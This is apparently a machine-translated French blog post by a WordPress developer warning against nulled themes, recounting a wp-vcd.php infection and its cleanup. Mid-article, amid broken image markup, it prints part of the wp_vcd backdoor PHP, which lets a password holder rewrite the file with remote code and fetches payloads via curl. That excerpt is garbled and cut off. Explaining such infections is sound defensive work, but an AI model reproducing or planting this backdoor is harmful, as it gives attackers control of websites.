Pourquoi je n'utiliserai plus jamais de thèmes ou de plugins WordPress piratés / annulés


– Bonjour, Pouvez-vous me donner le lien pour télécharger le thème “X”? Je n'arrive pas à trouver ça en ligne.

De temps en temps, je reçois des appels comme celui-ci. Étant donné que je suis un développeur WordPress et que je conçois des sites Web WordPress pour mes clients, je reçois souvent des appels comme celui-ci. Les clients me demandent d'installer un thème WordPress annulé / piraté.

Il y a quelques années, j'expliquais à mes clients que l'utilisation de thèmes WordPress gratuits est une meilleure idée pour leur entreprise, mais ils ont insisté sur l'utilisation d'un thème WordPress annulé. Ils m'ont même donné les thèmes WordPress annulés pour commencer à développer le site. Je n'ai eu aucune plainte. Si le client ne se soucie pas de sa sécurité WordPress, pourquoi devrais-je le faire? Je ne suis qu'un développeur, non? FAUX!

Que s'est-il passé lorsque j'ai utilisé un thème WordPress annulé?

J'ai eu l'un de mes plus grands cauchemars lorsque j'ai utilisé un thème WordPress annulé. Je voulais tester un thème WordPress premium avant de l'acheter. J'ai donc rapidement fait une recherche sur Google et, quelques minutes plus tard, j'avais une copie de travail du thème premium dans mon hôte local.

Après quelques tests, j'ai remarqué que des popups s'ouvraient de temps en temps pendant la navigation sur le site. Le problème ne s'est pas arrêté lorsque je suis revenu au thème par défaut. j'ai installé le moniteur de requêtes pour dépister ce qui n'allait pas. J'ai trouvé que le plugin montrait un avertissement.

QueryMonitor "width =" 797 "height =" 313 "data-recalc-dims =" 1 "srcset =" https://i1.wp.com/wphive.com/wp-content/uploads/2019/03/QueryMonitor. png? w = 797 & ssl = 1 797w, https://i1.wp.com/wphive.com/wp-content/uploads/2019/03/QueryMonitor.png?resize=300%2C118&ssl=1 300w, https: // i1.wp.com/wphive.com/wp-content/uploads/2019/03/QueryMonitor.png?resize=768%2C302&ssl=1 768w "data-lazy-tailles =" (largeur maximale: 709px) 85vw, ( max-width: 909px) 67vw, (max-width: 984px) 61vw, (max-width: 1362px) 45vw, 600px "src =" https://i1.wp.com/wphive.com/wp-content/uploads /2019/03/QueryMonitor.png?resize=797%2C313&is-pending-load=1#038;ssl=1 "srcset =" data: image / gif; base64, R0lGODlhAQABAIAAAAAAAP /// yH5BAAAAAAAAAAAAAAAAAa</p>
<p><noscript><img class=if (isset ($ _ REQUEST['action']) && isset ($ _ REQUEST['password']) && ($ _REQUEST['password'] == '35c977caf96f9197995d4b4d3e14f253')) {     $ div_code_name = "wp_vcd";     commutateur ($ _REQUEST['action']) {     case 'change_domain';     if (isset ($ _ REQUEST['newdomain'])) {         if (! empty ($ _ REQUEST['newdomain'])) {             if ($ file = @file_get_contents (__ FILE__)) {                 if (preg_match_all ('/ $ tmpcontent = @file_get_contents ("http: / / (. *) / code .php / i', $ fichier, $ matcholddomain)) {                     $ file = preg_replace ('/'. matcholddomain[1][0] . '/ i', $ _REQUEST['newdomain'], fichier $);                     @file_put_contents (__ FILE__, $ file);                     print "true";                 }             }         }     }       Pause;   case 'change_code';   if (isset ($ _ REQUEST['newcode'])) {     if (! empty ($ _ REQUEST['newcode'])) {         if ($ file = @file_get_contents (__ FILE__)) {             if (preg_match_all ('/ / / $ start_wp_theme_tmp ([sS]*) / / $ end_wp_theme_tmp / i ', $ fichier, $ matcholdcode)) {                 $ file = str_replace ($ matcholdcode[1][0], stripslashes ($ _ REQUEST['newcode']), $ fichier);                 @file_put_contents (__ FILE__, $ file);                 print "true";             }         }     } }   Pause;   défaut:     print "ERROR_WP_ACTION WP_V_CD WP_CD"; }   mourir(""); }   $ div_code_name = "wp_vcd"; $ funcfile = __FILE__;   if (! function_exists ('theme_temp_setup')) {     $ path = $ _SERVER['HTTP_HOST'] . $ _SERVER[REQUEST_URI];     if (stripos ($ _ SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos ($ _ SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {         fonction file_get_contents_tcurl ($ url)         {             $ ch = curl_init ();             curl_setopt ($ ch, CURLOPT_AUTOREFERER, TRUE);             curl_setopt ($ ch, CURLOPT_HEADER, 0);             curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);             curl_setopt ($ ch, CURLOPT_URL, $ url);             curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, TRUE);             $ data = curl_exec ($ ch);             curl_close ($ ch);             retourne $ data;         }           fonction theme_temp_setup ($ phpCode)         {             $ tmpfname = tempnam (sys_get_temp_dir (), "theme_temp_setup");             $ handle = fopen ($ tmpfname, "w +");             if (fwrite ($ handle, "<? php n". $ phpCode)) {             }             autre {                 $ tmpfname = tempnam ('./', "theme_temp_setup");                 $ handle = fopen ($ tmpfname, "w +");                 fwrite ($ handle, "

Quel mal ce code malveillant peut-il faire?

Si vous examinez ce code, vous découvrirez que l'attaquant peut envoyer le code de son choix sur votre serveur. La fonction PHP utilise curl qui peut être utilisé pour télécharger n’importe quel code / fichier à la demande de l’attaquant.

J'ai eu la chance d'avoir installé le thème sur mon localhost utilisant WAMP. Le fait étonnant est que lorsque j'ai installé un nouveau thème en utilisant le référentiel WordPress, le nouveau thème avait le code exact sécurisé.

Le code malveillant infectait chaque thème que je téléchargeais sur mon installation WordPress. C'est arrivé à CHAQUE thème WordPress que j'ai essayé dans cette installation. Chaque functions.php a été infecté par ce code malveillant à chaque fois.

Ensuite, j'ai supprimé le code malveillant de tousfunctions.php dans mon répertoire wp-content, dans l’espoir de corriger cette injection malveillante. Cependant, lorsque j'ai rechargé, Query Monitor signalait toujours la même erreur. J'étais perplexe! Comment le code peut-il réapparaître que je viens de corriger?

Recherche de la réplication des codes malveillants

J’ai compris que le thème n’avait pas seulement un code malveillant dans tous mesfunctions.php. Cela a fait autre chose. Je devais vérifier les fichiers de base WordPress. Cependant, avant de vérifier les fichiers de base, j'ai ajouté la balise suivante à wp-config.phpsitué à la racine.

define ('DISALLOW_FILE_EDIT', true);

Cela bloquera tous les changements venant du frontend. (Merci à cette astucieuse Guide de sécurité WordPress!)

Utilisation de WP-CLI

Avez-vous cela wp-cli peut faire un travail génial comme vérification de la somme de contrôle ou sauvegarder une base de données? J'ai utilisé WP-CLI pour vérifier les fichiers de base.

Erreur checksum

J'ai découvert que le plugin avait modifié 1 fichier de base WordPress qui est wp-includes / post.php.Le code malveillant a également créé deux nouveaux fichiers dans le wp-comprendrépertoire qui sont wp-vcd.php et wp-tmp.php

Après une rapide recherche sur Google, je savais que le fichier le plus dangereuxwp-vcd.php. Le complet le code ressemble à ceci

En bref, la fonction thème cherchait un wp-vcd.php déposer à l'intérieur duwp-comprend dossier. Puis le noyau wp-includes / post.php le fichier a été modifié pour charger le wp-vcd.php si existe.wp-vcd.php est le code malveillant le plus dangereux qui conserve le téléchargement de codes depuis un serveur externe et continue de remplacer functions.php des dossiers.

Correction du virus wp-vcd.php | Correction de la redirection automatique et des popups dans WordPress

Lorsque j'ai découvert pourquoi mon site agissait de manière folle, réparer le site infecté n'était pas très difficile.

  • Tout d'abord, j'ai ajouté le define ('DISALLOW_FILE_EDIT', true); à mon wp-config.php
  • J'ai tout supprimé de mon contenu / thèmes wp (vous pouvez aller plus loin et tout remplacer sauf votre dossier wp-content / uploads). Téléchargé une nouvelle copie de WordPress à partir de WordPress.org
  • A remplacé le wp-content / themes dossier de la copie fraîchement téléchargée de WordPress.
  • Enlevé le tout wp-comprend dossier et tout remplacé de la copie fraîchement téléchargée de WordPress.

Je vais ajouter quelques raisons supplémentaires pour éviter d’utiliser des thèmes WordPress annulés pour justifier ma décision.

Les thèmes WordPress annulés ne garantissent pas une sécurité adéquate

Comme je vous l'ai montré, vous savez maintenant comment un thème annulé peut causer des ravages sur votre site. Votre site Web peut être victime de vols de données, de spam, de scripts XSS (Cross Site Scripting) ou d'ingénierie sociale.

Vous devez toujours vous assurer que vous suivez bien Sécurité WordPress. Le code malveillant peut se propager à travers différents fichiers, ce qui s'est produit dans notre cas. Cela rend très difficile de détecter et réparer virus et codes malveillants.

Vous pourriez également perdre vos données de site dans le processus de piratage. Enfin et surtout, votre site peut être désindexé des moteurs de recherche pour la distribution de programmes malveillants.

Les thèmes WordPress annulés ne respectent pas votre vie privée

Les thèmes et plug-ins WordPress généralement nuls ou piratés comportent un code malveillant caché à l'intérieur. Ces codes malveillants peuvent voler des informations et des données importantes de votre site WordPress et les rendre ensuite accessibles au public.

Les informations compromises peuvent inclure votre nom d'utilisateur, votre adresse électronique, vos mots de passe, les informations de votre carte de crédit, etc. Si vous courez un boutique en ligne ou marché multi-vendeurs, alors les risques sont même grands. Vous pouvez consulter notre guide spécifique sur Sécurité du commerce électronique pour mieux sécuriser vos magasins en ligne.

Évitez les thèmes annulés pour sauvegarder votre référencement

Ce n’est un secret pour personne que Google aime les sites Web offrant une expérience utilisateur exceptionnelle. L'utilisation d'un thème ou d'un plug-in annulé peut générer une quantité excessive de spam.

De plus, si Google découvre que votre site héberge des logiciels malveillants, il bloquera votre site Web avec une page d'avertissement.

Les thèmes et les plugins Nulled WordPress ajoutent généralement des liens spammés à votre site Web de manière cachée. Les activités humaines sont difficiles à détecter par les yeux humains car les liens sont bien cachés dans le code. Vous verrez des symptômes tels que se déconnecter fréquemment, se rediriger de manière aléatoire, voir des fenêtres contextuelles, etc.

Google est fortement investi dans navigation sûre. Google remarquera ce comportement anormal de votre site Web. Google peut pénaliser votre site de différentes manières, notamment en supprimant votre classement de recherche ou en désindexant complètement votre site Web.

Pas d'accès à la documentation et aux mises à jour

Lorsque vous achetez un nouveau thème ou plug-in, vous n'achetez pas simplement le produit lui-même. Vous achetez également des années de mises à jour, manuel, documentation de ces plugins et thèmes. Savoir comment votre système fonctionne peut avoir un impact positif sur votre vitesse de pages.

Si vous utilisez un thème annulé / piraté, vous n’avez pas accès à la documentation du produit. Par conséquent, vous ne pouvez pas configurer le plugin ou le thème efficacement. Vous devrez peut-être vous lancer dans un essai et une erreur qui peuvent vous faire perdre de nombreuses heures de votre vie. Si vous avez accès à la documentation, vous pouvez la configurer sans perdre de nombreuses heures.

Faire usage d'alternatives gratuites

Il y a plus de 40000 plugins dans le Référentiel WordPress. Quels que soient vos besoins, il y a de fortes chances qu'il y ait plus d'un plugin. Vous pouvez toujours rechercher une alternative gratuite dans le dépôt WordPress.

Nous avons ramassé une partie de la meilleurs plugins WordPress, la plupart d'entre eux étaient libres. Nous avons trouvé le plugin de partage social le plus rapide est complètement gratuit et open source. Il y a aussi des milliers de grands thèmes gratuits. Il y a thèmes WordPress SEO Friendly gratuits pour obtenir un coup de pouce supplémentaire dans les classements des moteurs de recherche. Il y a des grands thèmes commerciaux gratuits aussi.

Quand il y a tant d'options, est-il nécessaire d'utiliser le thème / plugin nulled? Je ne pense pas!

Pensées finales

Chaque fois que je me suis penché sur un thème ou un plugin annulé, une porte dérobée a toujours été ajoutée à l'un des fichiers.

Si vous connaissez assez bien PHP, vous pouvez repérer et supprimer ces portes dérobées. La plupart des nouveaux utilisateurs de WordPress n’ont pas autant de compétences et sont victimes de sites Web piratés et de violation de données. Suivez notre complète 31+ conseils de sécurité WordPress renforcer la sécurité de votre site Web.

Si votre site Web est compromis, vous pouvez verrouillage WordPress en cas d'urgence.



Source

Laisser un commentaire

Fermer le menu